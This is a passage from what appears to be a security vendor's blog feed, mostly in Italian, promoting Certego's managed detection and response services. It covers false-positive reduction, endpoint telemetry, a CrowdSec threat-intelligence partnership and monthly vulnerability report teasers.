&lt;p&gt;Invece di trattare ogni allarme come un&apos;entità separata, la piattaforma &lt;strong&gt;raggruppa gli eventi in un singolo incidente, consentendo ai team di concentrarsi su minacce reali e prioritarie&lt;/strong&gt;, migliorando l&apos;efficienza operativa e riducendo il rischio di affaticamento da falsi positivi.&lt;/p&gt;
&lt;p&gt;L&apos;uso dell’analisi comportamentale avanzata e informazioni di Threat Intelligence avanzate aiuta a &lt;a href=&quot;https://www.certego.net/blog/riduzione-dei-falsi-positivi-strategia-certego-mdr-efficace/&quot;&gt;ridurre i falsi positivi&lt;/a&gt;, filtrando attività anomale che non rappresentano una reale minaccia.&lt;/p&gt;
&lt;h2&gt;7. Collaborazione semplificata&lt;/h2&gt;
&lt;p&gt;La piattaforma di Unified Security Operations di Certego è progettata per &lt;strong&gt;facilitare la collaborazione tra i team di sicurezza&lt;/strong&gt;, permettendo loro di lavorare in modo più coordinato ed efficiente.&lt;/p&gt;
&lt;p&gt;I processi di risposta possono essere orchestrati facilmente grazie a un&apos;interfaccia centralizzata che assegna compiti specifici a diversi team e favorisce la comunicazione tra gli stakeholder.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Il sistema di ticketing integrato nella piattaforma e le notifiche in tempo reale facilitano la comunicazione e la gestione dei compiti di Investigation e Incident Response&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;p&gt;In sintesi, affidarsi ai &lt;a href=&quot;https://www.certego.net/it/services/managed-detection-and-response/&quot;&gt;servizi MDR di Certego&lt;/a&gt;, erogati tramite la piattaforma di Unified Security Operations PanOptikon® consente non solo di migliorare le attività di rilevamento e risposta agli incidenti, ma anche di &lt;strong&gt;potenziare la visibilità e il controllo della sicurezza aziendale&lt;/strong&gt; ottimizzando le risorse interne e garantendo una protezione proattiva e scalabile.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Agosto 2024]]></description><link>https://www.certego.net/blog/whitepaper-agosto-2024-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-agosto-2024-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Sun, 08 Sep 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di agosto 2024, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Riduzione dei Falsi Positivi]]></title><description><![CDATA[La strategia di Certego per un servizio MDR più efficace]]></description><link>https://www.certego.net/blog/riduzione-dei-falsi-positivi-strategia-certego-mdr-efficace/</link><guid isPermaLink="false">riduzione-dei-falsi-positivi-strategia-certego-mdr-efficace</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 03 Sep 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Nel panorama della cybersecurity, la precisione è fondamentale. Ogni allerta emessa dai sistemi di sicurezza dovrebbe rappresentare una potenziale minaccia da affrontare con tempestività. Tuttavia, la realtà quotidiana per molti professionisti IT è ben diversa. Spesso, gran parte delle risorse è dedicata a gestire i cosiddetti falsi positivi, allarmi che segnalano un problema infondato.&lt;/p&gt;
&lt;p&gt;I falsi positivi non sono solo un fastidio; sono un ostacolo significativo per l&apos;efficienza operativa. Ogni allarme falso richiede tempo e attenzione, portando a una dispersione delle risorse e aumentando il rischio che un reale incidente passi inosservato.&lt;/p&gt;
&lt;p&gt;In questo articolo, esaminiamo il fenomeno dei falsi positivi nelle attività di rilevamento, mostrando come l’approccio di Certego, basato sulla visibilità dei dati telemetrici, uno stack tecnologico proprietario avanzato e il contributo di Analisti esperti, permette di ridurre drasticamente il numero dei falsi positivi a carico del cliente, migliorando così l&apos;efficacia complessiva dei servizi MDR.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;1. Visibilità del Dato Telemetrico&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;La visibilità dei dati telemetrici degli endpoint costituisce il fondamento della capacità di Certego di migliorare l’individuazione delle minacce e ridurre i falsi positivi&lt;/strong&gt; per i propri clienti.&lt;/p&gt;
&lt;p&gt;Attraverso la tecnologia avanzata della piattaforma &lt;strong&gt;Unified Security Operations, PanOptikon®&lt;/strong&gt;, Certego è in grado di raccogliere, arricchire e analizzare i dati grezzi provenienti dagli endpoint distribuiti nelle infrastrutture dei clienti.&lt;/p&gt;
&lt;p&gt;Questo approccio offre un enorme vantaggio rispetto all&apos;affidarsi esclusivamente ai dati generati dalle soluzioni EDR, poiché va oltre la semplice analisi degli allarmi prodotti dagli endpoint. La capacità di Certego di &lt;strong&gt;analizzare in profondità ai dati grezzi provenienti dai sensori&lt;/strong&gt; permette infatti una visibilità più completa dell&apos;attività degli endpoint. Questo garantisce una rilevazione delle minacce più precisa ed efficace, basata sull’arricchimento dei dati grezzi di telemetria.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;2. Applicazione delle regole di Threat Detection e Correlazione degli Eventi&lt;/h2&gt;
&lt;p&gt;Una volta che i dati grezzi degli endpoint vengono raccolti all&apos;interno della piattaforma PanOptikon®, la fase successiva consiste nell’&lt;strong&gt;applicare le regole di rilevamento (Threat Detection) di Certego ai dati telemetrici&lt;/strong&gt;, sfruttando una combinazione di analisi comportamentale e indicatori di compromissione per rilevare vari tipi di minacce di ultima generazione di tipo malware, furto di credenziali, ransomware, etc.&lt;/p&gt;
&lt;p&gt;I dati telemetrici, raccolti dai sensori distribuiti sugli endpoint, vengono arricchiti con l’applicazione delle regole di Threat Detection di Certego per identificare attività sospette, come accessi non autorizzati, script dannosi o comportamenti anomali dei processi. In Certego fruttiamo la correlazione multi-evento per collegare queste attività, fornendo una visione completa delle potenziali minacce.&lt;/p&gt;
&lt;p&gt;Ad esempio, se la piattaforma PanOptikon® rileva l’esecuzione di PowerShell con un comando codificato o un binario sconosciuto in esecuzione, correla queste azioni con il traffico di rete, la creazione di processi o le modifiche ai file per determinare se il comportamento fa parte di un attacco più ampio.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;La correlazione degli eventi è un elemento chiave&lt;/strong&gt; del processo, poiché consente di collegare tra loro eventi che, presi singolarmente, potrebbero sembrare isolati, ma che, una volta uniti, rivelano una sequenza di attività potenzialmente legate a un attacco complesso. Questo approccio consente di identificare minacce sofisticate che potrebbero sfuggire ai sistemi tradizionali di rilevamento sugli endpoint.&lt;/p&gt;
&lt;p&gt;Solo grazie alle attività svolte dai team di Threat Intelligence e Threat Detection di Certego, che studiano quotidianamente le tecniche di attacco emergenti, è possibile sviluppare specifiche regole di rilevamento, applicabili al dato telemetrico, per intercettare minacce di ultima generazione, molto spesso difficili da identificare.&lt;/p&gt;
&lt;p&gt;L’analisi multi-step contribuisce inoltre a migliorare l’efficacia del rilevamento riducendo i falsi positivi nelle fasi iniziali. In questo modo, solo le minacce reali vengono segnalate agli Analisti di Certego, consentendo loro di concentrarsi su indagini approfondite e interventi mirati.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;3. Analisi degli Allarmi e riduzione dei Falsi Positivi&lt;/h2&gt;
&lt;p&gt;Una volta che gli eventi sono stati correlati, le correlazioni rilevate all&apos;interno della piattaforma PanOptikon® generano allarmi che segnalano potenziali minacce da sottoporre a un&apos;ulteriore analisi.&lt;/p&gt;
&lt;p&gt;Quando viene attivato un allarme sulla piattaforma PanOptikon®, gli &lt;strong&gt;Analisti del team di Security Operations&lt;/strong&gt; di Certego lo classificano in base alla gravità e al rischio. Esaminano ogni allarme sfruttando la visibilità dei dati telemetrici degli endpoint e i dati correlati dall&apos;ecosistema di sicurezza per condurre analisi approfondite. In questa fase, verificano la presenza di attività anomale o indicatori di compromissione (IOC), come comportamenti sospetti dei file, processi insoliti o anomalie nel traffico di rete, per avere una visione completa del contesto dell&apos;allarme.&lt;/p&gt;
&lt;p&gt;Una volta confermata la minaccia, gli Analisti prendono le misure necessarie per contenere e neutralizzare l&apos;attacco. Le azioni correttive possono includere l&apos;isolamento dei sistemi compromessi, la rimozione dei file dannosi e il ripristino della sicurezza dell&apos;infrastruttura.
Gli Analisti collaborano strettamente con i team di sicurezza interni alle aziende clienti per assicurare che tutte le misure siano tempestive ed efficaci, minimizzando l’impatto sull’organizzazione.&lt;/p&gt;
&lt;p&gt;Questo processo accurato e strutturato permette di ridurre significativamente i falsi positivi, assicurando che le risorse vengano utilizzate solo per gestire le minacce reali.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;4. Esempio pratico&lt;/h2&gt;
&lt;p&gt;Esaminiamo un caso concreto relativo a una PMI operante nel settore manifatturiero, che chiameremo Gamma.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/4e58a73716c0c0105722bc0229fb5029/a878e/CertegoFalsiPositivi.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 57.552083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAAC4jAAAuIwF4pT92AAABlUlEQVR42pVSyY7UMBD1v/I7cEGCG/fhMDdOXLmgRmL6EAm6p7tDJ3Y2L1mmE9vlJVTSQsOMNBK8U5Wr3quqJ5OqLNKinldkstuX/NQo1g7GGK11CGF+GeRY1FlRBu8xoWW1P6VnVnLZ6hV+fX+R3AiZ8xacm/8fpOLiVCvrlgkxRtwzrvgn8qbsOefeuWft8Wl8TZ9pEiF4JxoNTvs4h8CyTA0P2KP9o1U6xKU6z6N7shP51agtDp8gHf1g4HNy3FJ+8TFpjfvTqCYrJ4sX0X608OgOYY3Y1cqA8zEyHd+ncFs4H0JvACx0XY9m4FEOAIe61ZG/3OZCcu5Wt+kU3h31LbXXWjdO334eH2DZH8vR+4Zm3i+dIeCsSL4X7X0lg4Mr+e1Bf8zNlfxVute76a7zjVQ7WjejuUnoYBcyo2wYBpLJoVA94G+Ic2XihzN8qpYYhTfKvznYTYvKYI3OxvBqa+8vAfeGJAmXC2GM0TyXQqIeFyIr6zRn0zRheqrEl31+KDjG6EJdNz/OLGPM4bcDmL3/DU0NsO/7bng7AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/4e58a73716c0c0105722bc0229fb5029/71c1d/CertegoFalsiPositivi.png&quot; srcset=&quot;/website/static/4e58a73716c0c0105722bc0229fb5029/804b2/CertegoFalsiPositivi.png 384w,
/website/static/4e58a73716c0c0105722bc0229fb5029/e5715/CertegoFalsiPositivi.png 768w,
/website/static/4e58a73716c0c0105722bc0229fb5029/71c1d/CertegoFalsiPositivi.png 1536w,
/website/static/4e58a73716c0c0105722bc0229fb5029/a878e/CertegoFalsiPositivi.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Nel corso di un anno, Certego ha elaborato e analizzato &lt;strong&gt;14,6 miliardi di dati telemetrici grezzi&lt;/strong&gt; provenienti dai sensori endpoint distribuiti nell&apos;infrastruttura aziendale di Gamma.&lt;/p&gt;
&lt;p&gt;In seguito all&apos;acquisizione dei dati, la piattaforma PanOptikon® ha applicato automaticamente le regole di rilevamento (Detection Engine) sviluppate dal team di Threat Detection.&lt;/p&gt;
&lt;p&gt;Queste regole hanno inizialmente generato oltre &lt;strong&gt;270 mila eventi sospetti&lt;/strong&gt;, che hanno richiesto un&apos;analisi approfondita. Attraverso l’attività di correlazione, che ha collegato i vari eventi sospetti, PanOptikon® ha ridotto il numero complessivo, generando &lt;strong&gt;14.200 allarmi&lt;/strong&gt; da sottoporre a ulteriore analisi.
A questo punto, gli Analisti del team di Security Operations di Certego sono intervenuti: grazie alla possibilità di condurre analisi dettagliate sui dati telemetrici direttamente all’interno della piattaforma PanOptikon®, &lt;strong&gt;hanno ridotto i falsi positivi del 94%&lt;/strong&gt;, gestendo infine 796 incidenti nel periodo di riferimento.&lt;/p&gt;
&lt;p&gt;Infine, ma non per importanza, dei 796 incidenti gestiti solo 6 erano compresi tra un livello di rischio 4 e 5, quello potenzialmente più elevato.&lt;/p&gt;
&lt;p&gt;Grazie al servizio di Managed Detection and Response (MDR) di Certego, l&apos;azienda Gamma beneficia di una soluzione avanzata in grado di esaminare in più fasi e in maniera più approfondita gli eventi di cybersecurity, riducendo drasticamente i falsi positivi e ottimizzando i processi interni di gestione degli incidenti.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego and CrowdSec]]></title><description><![CDATA[Joining Forces to Make the Internet Safer]]></description><link>https://www.certego.net/blog/crowdsec-threat-intelligence-partnership/</link><guid isPermaLink="false">crowdsec-threat-intelligence-partnership</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Sun, 01 Sep 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Since our founding in 2013, Certego’s MDR services have been driven by Threat Intelligence, providing proactive protection backed by high-quality, up-to-date data. This approach allows us to respond swiftly to threats, continuously strengthening our clients’ defenses and delivering adaptive, effective protection in an ever-evolving digital landscape.&lt;/p&gt;
&lt;p&gt;Our many initiatives over the years have established Certego’s Threat Intelligence team as a recognized force on the international stage. A notable example is our recent participation in #FIRSTCON24 in Fukuoka, Japan, in June 2024, where we showcased IntelOwl, Certego’s Threat Intelligence Investigation platform, which is integrated within our Unified Security Operations platform, PanOptikon®.&lt;/p&gt;
&lt;p&gt;We believe that information sharing and global cooperation are essential for enhancing security. Over the years, we’ve established top-tier international partnerships in the Threat Intelligence field. Today, &lt;strong&gt;we are proud to announce a new collaboration with CrowdSec, an international leader in Cyber Threat Intelligence&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&quot;This partnership aims to create a more integrated and effective security ecosystem, &lt;strong&gt;leveraging the sharing of Indicators of Compromise (IoC) between the two companies to provide increasingly advanced solutions for protecting infrastructures&lt;/strong&gt;,&quot; says Matteo Lodi, Threat Intelligence Team Leader at Certego.&lt;/p&gt;
&lt;h1&gt;CrowdSec&lt;/h1&gt;
&lt;p&gt;&lt;a href=&quot;https://www.crowdsec.net/&quot;&gt;CrowdSec&lt;/a&gt; is an &lt;strong&gt;innovative cybersecurity company that adopts a collaborative, open source approach to protect digital assets from emerging threats&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The CrowdSec Security Engine is designed for SOC and DevSecOps communities, using collective intelligence to proactively detect and mitigate attacks. One of CrowdSec’s key features is its global IP reputation database, supported by over 65,000 active installations and 80,000 active users across more than 190 countries. Each user contributes to this collective intelligence, continuously updating the IP reputation database, resulting in a constantly evolving defense against cyber threats. &lt;strong&gt;Threats shared by users are processed using the CrowdSec consensus calculator, ensuring the CTI info is reliable, properly classified, and updated in real time, providing always fresh data&lt;/strong&gt;.
CrowdSec stands out for its ability to prevent intrusions rather than merely reacting to breaches, making it an ideal tool for stopping threats before they can compromise systems.&lt;/p&gt;
&lt;p&gt;&quot;The partnership between Certego and CrowdSec combines the reliability of both companies&apos; information and expertise. CrowdSec chose Certego for the high reliability of our IoCs and our solid experience in aggregating and sharing indicators of compromise,&quot; adds Matteo Lodi. This collaboration represents a perfect synergy, harnessing the strengths of both companies to deliver advanced defense tools against digital threats.&lt;/p&gt;
&lt;p&gt;The collaboration between Certego and CrowdSec will bring significant benefits to both parties and their clients:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;For CrowdSec’s clients&lt;/strong&gt;: Certego’s data, in the form of IoCs, will be directly integrated into CrowdSec’s platform. This will allow clients to access broader, constantly updated, and high-quality Threat Intelligence, enhancing their ability to prevent attacks and safeguard their infrastructures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;For Certego’s analysts&lt;/strong&gt;: access to IoCs from CrowdSec’s global network will enable Certego to conduct more detailed and accurate investigations. Analysts will be able to leverage this data to improve incident detection and response, increasing the precision of investigative and threat response activities.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The partnership between Certego and CrowdSec unites two companies that share a core value: the reliability of information and collaboration in the fight against cyber threats. Through this strategic partnership, Certego and CrowdSec are at the forefront of cybersecurity, offering increasingly effective and dependable solutions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Together with CrowdSec, we are working to make the digital world a safer place for all organizations, helping to build a future founded on shared intelligence and collaborative security&lt;/strong&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Luglio 2024]]></description><link>https://www.certego.net/blog/whitepaper-luglio-2024-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-luglio-2024-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Tue, 13 Aug 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di luglio 2024, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Telemetria degli Endpoint]]></title><description><![CDATA[Migliorare la sicurezza con un approccio basato sulla visibilità dei dati telemetrici]]></description><link>https://www.certego.net/blog/telemetria-degli-endpoint-migliorare-la-sicurezza-con-un-approccio-basato-sulla-visibilita-dei-dati-telemetrici/</link><guid isPermaLink="false">telemetria-degli-endpoint-migliorare-la-sicurezza-con-un-approccio-basato-sulla-visibilita-dei-dati-telemetrici</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 16 Jul 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;L&apos;aumento della sofisticazione delle minacce informatiche ha reso sempre più difficile proteggere in modo affidabile un ambiente IT con le soluzioni di sicurezza tradizionali.&lt;/p&gt;
&lt;p&gt;La trasformazione digitale, l&apos;adozione massiccia del cloud e il lavoro ibrido ampliano la gamma di dispositivi endpoint collegati alle reti aziendali, rendendo la loro protezione una sfida enorme per i professionisti IT. &lt;strong&gt;La superficie di attacco si è ampliata enormemente e i punti ciechi nelle infrastrutture IT sono un rischio crescente&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;La telemetria degli endpoint è diventata vitale in questo contesto, offrendo informazioni in tempo reale sulle attività e sulla postura di sicurezza di questi dispositivi. Senza questi dati, affidandosi unicamente agli avvisi delle tecnologie EDR, &lt;strong&gt;le squadre di sicurezza potrebbero non accorgersi di quando e come gli asset chiave vengono compromessi&lt;/strong&gt;, scoprendo le violazioni solo dopo che un attaccante ha già ottenuto una posizione di vantaggio.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Cos’è la telemetria degli Endpoint?&lt;/h2&gt;
&lt;p&gt;Nel mondo della cybersecurity si dice: &quot;non puoi proteggere ciò che non puoi vedere&quot;. Ed è qui che entra in gioco la telemetria.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;La telemetria degli endpoint è il processo di raccolta, trasmissione e analisi di dati grezzi dai dispositivi finali di una rete&lt;/strong&gt;, come computer, smartphone, tablet e dispositivi IoT.&lt;/p&gt;
&lt;p&gt;Questi dati includono informazioni su attività di sistema, utilizzo delle applicazioni, eventi di sicurezza e configurazioni hardware e software, fornendo una visibilità dettagliata e in tempo reale sugli endpoint.&lt;/p&gt;
&lt;p&gt;Le fonti di telemetria degli endpoint includono:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Processi di sistema:&lt;/strong&gt; monitoraggio delle attività dei processi in esecuzione;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Modifiche ai file&lt;/strong&gt;: registrazione delle modifiche ai file critici;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cambiamenti del registro&lt;/strong&gt;: tracciamento delle modifiche al registro di sistema;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Connessioni di rete&lt;/strong&gt;: analisi delle connessioni di rete per individuare attività sospette.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Avere a disposizione una soluzione tecnologica in grado di aggregare e analizzare i dati grezzi degli endpoint consente alle aziende di essere meglio informate sui potenziali problemi di sicurezza. La raccolta di dati grezzi degli endpoint e l&apos;uso di analisi comportamentali avanzate permettono di esaminare gli eventi in tempo reale, offrendo una visibilità approfondita, la capacità di aggiornare rapidamente i sistemi e rispondere prontamente agli incidenti.&lt;/p&gt;
&lt;p&gt;Proviamo a spiegare la telemetria degli endpoint con una analogia…&lt;/p&gt;
&lt;p&gt;Immagina di essere un medico responsabile del monitoraggio della salute dei pazienti in un ospedale. Ogni paziente ha esigenze diverse e ogni situazione medica è unica, quindi è essenziale avere una visione completa e continua delle loro condizioni di salute. Durante il ricovero, ogni paziente è collegato a dispositivi medici che monitorano costantemente parametri vitali come la frequenza cardiaca, la pressione sanguigna e la temperatura corporea. Questi dati vengono raccolti in tempo reale e registrati nei sistemi dell&apos;ospedale.&lt;/p&gt;
&lt;p&gt;Il monitoraggio della salute non serve solo a tenere sotto osservazione lo stato attuale del paziente, ma anche a fare aggiustamenti informati al trattamento.&lt;/p&gt;
&lt;p&gt;Ipotizziamo che un paziente riporti sintomi insoliti durante il ricovero. Senza i dati clinici raccolti durante gli esami , sarebbe difficile determinare la causa del problema. Tuttavia, grazie ai dati raccolti in precedenza, il medico può analizzare i trend e le anomalie che potrebbero aver contribuito ai sintomi. Questo permette di intervenire rapidamente, modificando il trattamento per evitare ulteriori complicazioni.&lt;/p&gt;
&lt;p&gt;Proprio come un medico utilizza i dati diagnostici per monitorare e ottimizzare la salute e il trattamento dei suoi pazienti, &lt;strong&gt;la telemetria degli endpoint fornisce alle squadre di sicurezza informatica le informazioni necessarie per mantenere la sicurezza e la funzionalità dei sistemi aziendali&lt;/strong&gt;. La raccolta continua e l&apos;analisi degli eventi permettono di identificare e risolvere problemi in modo proattivo, garantendo che gli endpoint siano sempre protetti.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Vantaggi della telemetria degli Endpoint&lt;/h2&gt;
&lt;p&gt;La raccolta e l&apos;analisi degli eventi telemetrici degli endpoint permette di identificare e risolvere  problemi in modo proattivo:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Minimizzare i punti ciechi di visibilità&lt;/h3&gt;
&lt;p&gt;Senza la telemetria degli endpoint, alcune attività dannose potrebbero passare inosservate. Riduce i punti ciechi, migliorando la capacità di individuare comportamenti anomali.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Rilevare i comportamenti degli avversari prima&lt;/h3&gt;
&lt;p&gt;Tecniche come l&apos;abuso di PowerShell e l&apos;iniezione di processi, spesso utilizzate per eseguire attacchi di malware senza file, possono essere individuate solo attraverso un&apos;analisi dettagliata dei dati telemetrici, permettendo ai team di sicurezza di intervenire rapidamente.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Rilevare minacce sconosciute&lt;/h3&gt;
&lt;p&gt;Il rilevamento delle minacce non deve limitarsi alle minacce conosciute. Applicando gli IoCs e BIoCs sempre aggiornate, l’analisi telemetrica permette di scoprire attività sospette che potrebbero indicare nuove minacce.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Ridurre il numero di falsi positivi&lt;/h3&gt;
&lt;p&gt;Una telemetria ben analizzata e correttamente correlata permette di filtrare gli allarmi non rilevanti, migliorando l&apos;efficacia dei team di sicurezza e riducendo il tempo dedicato ai falsi allarmi.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Fornire un contesto maggiore&lt;/h3&gt;
&lt;p&gt;Le rilevazioni basate sulla rete spesso mancano dei dettagli necessari per prendere decisioni rapide e precise. I dati telemetrici degli endpoint consentono indagini forensi più approfondite e risposte più efficaci agli incidenti di sicurezza.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Maggiore precisione dell’Intelligence sulle minacce&lt;/h3&gt;
&lt;p&gt;Le informazioni ottenute dai dati di telemetria consentono di identificare pattern e trend che migliorano la capacità di rilevare e prevenire futuri attacchi.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;h2&gt;L&apos;approccio di Certego alla telemetria degli Endpoint&lt;/h2&gt;
&lt;p&gt;Per implementare una strategia di cybersecurity che sfrutti i vantaggi della telemetria degli endpoint, è essenziale poter contare su una soluzione tecnologica avanzata.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;La piattaforma PanOptikon® di Certego offre strumenti per la visibilità completa dei dati grezzi degli endpoint&lt;/strong&gt;. Con regole di casi d&apos;uso mappate al MITRE ATT&amp;#x26;CK e playbook di risposta automatizzati, PanOptikon® identifica, contiene e interrompe le minacce rapidamente ed efficacemente.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Certego applica la propria threat intelligence ai dati telemetrici&lt;/strong&gt;, utilizzando Indicatori di Compromissione (IoCs) e Indicatori Comportamentali di Compromissione (BIOCs). Gli IoCs sono segnali specifici di minaccia, come hash di file malevoli, indirizzi IP sospetti o domini di comando e controllo. I BIOCs identificano modelli di comportamento sospetti, o tentativi di iniezione di processi.&lt;/p&gt;
&lt;p&gt;Tuttavia, realizzare il valore della telemetria degli endpoint non significa semplicemente installare lo strumento giusto e catturare ogni informazione disponibile. Per ottenere i migliori risultati, è importante comprendere quali dati analizzare, arricchirli adeguatamente e rispondere rapidamente ed efficacemente alle attività dannose rilevate. Combinando &lt;strong&gt;professionisti della sicurezza esperti&lt;/strong&gt;, &lt;strong&gt;tecnologia di primo livello&lt;/strong&gt; e &lt;strong&gt;intelligenza sulle minacce&lt;/strong&gt;, si può accelerare il tempo necessario per rilevare e rispondere agli attacchi più recenti.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Mentre la maggior parte delle integrazioni con le soluzioni Endpoint si concentrano sugli avvisi generati dalla piattaforma, la tecnologia proprietaria di Certego acquisisce sia gli avvisi sia la telemetria grezza generata dai sensori EDR. Questa telemetria viene elaborata e analizzata dalla piattaforma PanOptikon® e dal nostro Security Operations Team per confermare e investigare le minacce, eliminando i falsi positivi&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;In Certego, utilizziamo i dati telemetrici degli endpoint in vari modi per migliorare la sicurezza delle reti aziendali. Ecco come lavoriamo con questi dati:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Raccolta e integrazione dei dati&lt;/strong&gt;:
&lt;ul&gt;
